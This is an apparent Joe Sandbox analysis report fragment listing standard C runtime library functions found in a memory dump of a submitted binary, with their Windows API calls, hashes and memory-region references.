Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID:
API String ID: 712880209-0
Opcode ID: 77f94ca8ce5f3ab96d1a6104bd9c8df063bb6e0452bd5ebb4ab554c7523d4cbb
Instruction ID: c17ceeb1990cabe6dd1ee2392de6d240739c43094d7ff3a44c5577cffddfcf84
Opcode Fuzzy Hash: 77f94ca8ce5f3ab96d1a6104bd9c8df063bb6e0452bd5ebb4ab554c7523d4cbb
Instruction Fuzzy Hash: BC11AF71A002149FCB11EB66D8017AEBBF5AFC4312FA04519F805A7291DB70AE09CB81

Function 0095B9D4 Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,0095B9CB,00959F90,00955EE2,48294190,?,?,?,?,0096F5A3,000000FF), ref: 0095B9E2
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0095B9F0
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0095BA09
SetLastError.KERNEL32(00000000,?,0095B9CB,00959F90,00955EE2,48294190,?,?,?,?,0096F5A3,000000FF), ref: 0095BA5B

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e7cca15071341a3c4039d6d0c58a570a91a2a64b43604d5d7c47edaf200b05e5
Instruction ID: 6c30a714d4c2ae3925d1200d62a47a6abaac638d09b10afdcd9a4ac85cf73ad1
Opcode Fuzzy Hash: e7cca15071341a3c4039d6d0c58a570a91a2a64b43604d5d7c47edaf200b05e5
Instruction Fuzzy Hash: 32015E7621D3119EEA64A776AC96A7B27D8EB51777B20023AFD24950E2EF214809E340

Function 009605CC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,48294190,00000000,?,00000000,0096F7CA,000000FF,?,0096055C,?,?,00960530,?), ref: 00960601
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00960613
FreeLibrary.KERNEL32(00000000,?,00000000,0096F7CA,000000FF,?,0096055C,?,?,00960530,?), ref: 00960635

Strings

mscoree.dll, xrefs: 009605FA
CorExitProcess, xrefs: 0096060B

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 732f2ef30e95fe22a4566c62017bd57b31e294ae7f7598eaf6697a346db74a0e
Instruction ID: 1defced225338ac0f2c197732e8bb24d1b1815673955e81736f355caeaef986f
Opcode Fuzzy Hash: 732f2ef30e95fe22a4566c62017bd57b31e294ae7f7598eaf6697a346db74a0e
Instruction Fuzzy Hash: AC01A272914619EFDB159F50CC05FAFBBBCFB84B25F004626E815A22D0DB749840DA90

Function 00964FAD Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00965034
__alloca_probe_16.LIBCMT ref: 009650F5
__freea.LIBCMT ref: 0096515C

Part of subcall function 00963E93: HeapAlloc.KERNEL32(00000000,0095554A,?,?,0095996A,?,?,?,00000000,?,0095278B,0095554A,?,?,?,?), ref: 00963EC5

__freea.LIBCMT ref: 00965171
__freea.LIBCMT ref: 00965181

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 918e686236c8dd970e1f89862218d2d8bd747b8c0fcbfa5a03b9b041287eccc8
Instruction ID: 03b78275602fb19d5149efc9405222c625a15a72f097ea6429a4cc20b714bd6d
Opcode Fuzzy Hash: 918e686236c8dd970e1f89862218d2d8bd747b8c0fcbfa5a03b9b041287eccc8
Instruction Fuzzy Hash: 9351D172604606AFEB219FA4CC81FBB7AADEF45350F270529FD08E6151EB71CD1087A0

Function 009560CB Relevance: 7.6, APIs: 5, Instructions: 116threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 009560DF
AcquireSRWLockExclusive.KERNEL32(?,?,00954F82,?,?,00953F83), ref: 009560FE
AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00954F82,?,?,00953F83), ref: 0095612C
TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00954F82,?,?,00953F83), ref: 00956187
TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00954F82,?,?,00953F83), ref: 0095619E

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: AcquireExclusiveLock$CurrentThread
String ID:
API String ID: 66001078-0
Opcode ID: e383a1d3b25076427cac5e4312e9880f431cc5b91adf453c214c805262cc7c9e
Instruction ID: 05957a43e8cd6bee7417f73b03efb33419dcd00ca0c256e3548a921ba57e2f94
Opcode Fuzzy Hash: e383a1d3b25076427cac5e4312e9880f431cc5b91adf453c214c805262cc7c9e
Instruction Fuzzy Hash: 5F416E31508A06DFCB20CF66C885A7AB7F8FF45312B90492AD84AD7542DB30F989CB50

Function 009565DF Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 009565E6
std::_Lockit::_Lockit.LIBCPMT ref: 009565F1
std::_Lockit::~_Lockit.LIBCPMT ref: 0095665F

Part of subcall function 00956742: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0095675A

std::locale::_Setgloballocale.LIBCPMT ref: 0095660C
_Yarn.LIBCPMT ref: 00956622

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: 39f7ac64316e327f726b1de21d54a72ce86bce334802157b1bf974ce599483e6
Instruction ID: 2a98d551f1cf6bcf7f58329fb805818ff22daedc4e93fbea90bf290582d25996
Opcode Fuzzy Hash: 39f7ac64316e327f726b1de21d54a72ce86bce334802157b1bf974ce599483e6
Instruction Fuzzy Hash: 9701DFB6A00110DBC706EF21D855A7D3BA1BFC4746BA94008EC1957391DF746E4ADB85

Function 0095CAD7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,0095CA88,?,?,00000000,?,?,?,0095CBB2,00000002,FlsGetValue,00972068,FlsGetValue), ref: 0095CAE4
GetLastError.KERNEL32(?,0095CA88,?,?,00000000,?,?,?,0095CBB2,00000002,FlsGetValue,00972068,FlsGetValue,?,?,0095B9F5), ref: 0095CAEE
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 0095CB16

Strings

api-ms-, xrefs: 0095CAFB

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 23d0a2bd8ed9866d8ae2f3520c9c9b90ce19afdaeb0e4e00c126e16d478ace5d
Instruction ID: 6558656044be6eca273342e15c907023415848dddf64e502e583c99c938a6790
Opcode Fuzzy Hash: 23d0a2bd8ed9866d8ae2f3520c9c9b90ce19afdaeb0e4e00c126e16d478ace5d
Instruction Fuzzy Hash: 4CE01A71694349FEEA201BA2EC0AF193A59AB40B95F108020F90DB80E2D7A29854E6A4

Function 00965576 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(48294190,00000000,00000000,00000000), ref: 009655D9

Part of subcall function 00968035: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00965152,?,00000000,-00000008), ref: 009680E1

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00965834
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0096587C
GetLastError.KERNEL32 ref: 0096591F

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 52f4f0a03b10e4b53e4cc79f3119e41f4bbdd0bacb1562762aea458f8368362c
Instruction ID: c39157a87400b64ae9643e8a3d09e15ece4f298778176a42e3c9d173c3500dff
Opcode Fuzzy Hash: 52f4f0a03b10e4b53e4cc79f3119e41f4bbdd0bacb1562762aea458f8368362c
Instruction Fuzzy Hash: F2D17875D00648DFCF15CFA8D880AADBBB9FF48314F19852AE856E7251E730A941CF50

Function 0095BAEB Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0095BBB2
___AdjustPointer.LIBCMT ref: 0095BBD5
___AdjustPointer.LIBCMT ref: 0095BC71

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: ce0db72b0a19b7f8c106dcc35223018192ecf894a421d53609b10acfb6386408
Instruction ID: 0e93a0331d2cd0630a895f27c7bfcb1287b04fb6abd23bed577cf60b37f430dc
Opcode Fuzzy Hash: ce0db72b0a19b7f8c106dcc35223018192ecf894a421d53609b10acfb6386408
Instruction Fuzzy Hash: 9951F772A04606DFDB28CF17D841B7AB3A8EF84302F14442DED8557191EB71EC88DB94

Function 009682F5 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00968035: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00965152,?,00000000,-00000008), ref: 009680E1

GetLastError.KERNEL32 ref: 00968359
__dosmaperr.LIBCMT ref: 00968360
GetLastError.KERNEL32(?,?,?,?), ref: 0096839A
__dosmaperr.LIBCMT ref: 009683A1

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 7b1326ec828b6e9245ffc6b299f8a88955705cc00073d1244e0553e22472a6d6
Instruction ID: 6ea2d638091a3abc399bf8a1c0a424f815e2959aff7eee531d7d8097e89203a9
Opcode Fuzzy Hash: 7b1326ec828b6e9245ffc6b299f8a88955705cc00073d1244e0553e22472a6d6
Instruction Fuzzy Hash: 98218E71600209AFDB20EF66C891E6BB7ADFF947647108A28FD6997651DF34EC408B90

Function 0095FE04 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b935b3c6d5f3648db5be1281ae51becc0b13303688d0eedbf1678464f09b4827
Instruction ID: 681109e39f26b4ff693f0dfa9f55df845d7b6ce346a52a304edfcc5f24e481db
Opcode Fuzzy Hash: b935b3c6d5f3648db5be1281ae51becc0b13303688d0eedbf1678464f09b4827
Instruction Fuzzy Hash: E0219231200205AFCB20EF66DCA2E6B776DAF813767104935FD1997162D734DC4C8790

Function 0096928B Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00969293

Part of subcall function 00968035: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00965152,?,00000000,-00000008), ref: 009680E1

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009692CB
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009692EB

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 3bcec75dc69a322a730973143a2b2973ffc26c8cb131c7965fd041071c3848c5
Instruction ID: 682cb4e8899ccc5d68f2bf89fcffde182e11e550ad776473448606b4cb7719d5
Opcode Fuzzy Hash: 3bcec75dc69a322a730973143a2b2973ffc26c8cb131c7965fd041071c3848c5
Instruction Fuzzy Hash: 0B11D2B2909615BF6B1127B19C8DDBF7A5CDFCA3E87500424F406E6242EA74DE4191B1

Function 00951F5B Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00951F67
int.LIBCPMT ref: 00951F7A

Part of subcall function 00952D8F: std::_Lockit::_Lockit.LIBCPMT ref: 00952DA0
Part of subcall function 00952D8F: std::_Lockit::~_Lockit.LIBCPMT ref: 00952DBA

std::_Facet_Register.LIBCPMT ref: 00951FAD
std::_Lockit::~_Lockit.LIBCPMT ref: 00951FC3

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: f770d334c88ee4aac2d9fb283e90ccb2df85ea45361ec5a56ae6543031241a79
Instruction ID: 77bfa50fd374e5f5806a2aab36706db5e0026a4a837625cd065653fec9b02017
Opcode Fuzzy Hash: f770d334c88ee4aac2d9fb283e90ccb2df85ea45361ec5a56ae6543031241a79
Instruction Fuzzy Hash: F1012B72904114AFCB14FB56D805AAD77ECDFC0361B114108FC0497292EB309E49D7C0

